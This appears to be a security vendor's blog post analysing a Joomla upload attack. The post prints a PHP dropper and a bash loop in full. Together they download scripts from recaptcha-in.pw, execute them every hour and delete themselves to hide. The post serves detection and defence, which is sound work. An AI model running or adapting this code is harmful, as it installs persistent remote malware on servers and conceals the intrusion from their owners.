Top

proc.php

Again we found new malware, that trying using php shell_exec function to download and include more malware to server.

POST Payload

This looks like joomla file upload vulnerability:

--2a2ea832-B--
POST /administrator/index.php?option=com_installer&videw=install HTTP/1.0

Payload trying upload proc.php file to server and execute it:

proc.php

--2a2ea832-C--
Wordpress
<?php
shell_exec("pkill bash 2>&1");
shell_exec("pkill sh 2>&1");
shell_exec("wget hxxp://recaptcha-in.pw/bash/p.sh 2>&1");
shell_exec("nohup bash ./p.sh & 2>&1");
shell_exec("rm p.sh 2>&1");
unlink(__FILE__);
?>

p.sh

It’s trying download p.sh bash script and execute it. When it executed it remove itself and also final remove also proc.php to hiding itself.

while :; do wget -c hxxp://recaptcha-in.pw/bash/xtaccess -O p.php &> /dev/null;
chmod 777 p.php &> /dev/null; php ${PWD}/p.php &> /dev/null;
wget -c hxxp://recaptcha-in.pw/bash/head -O h.php &> /dev/null;
chmod 777 h.php &> /dev/null; php ${PWD}/h.php &> /dev/null; sleep 3600; done

Again it download more malware (p.php & h.php) files and executed them. These infect more php files.

Final words

If server PHP disable_functions include shell_exec function, this is harmfull.

Websites that using Malware Expert – ModSecurity rules are protected against this attack.

Use Malware Expert – Signatures detect this malware from files for FREE!

, , ,

Comments are closed.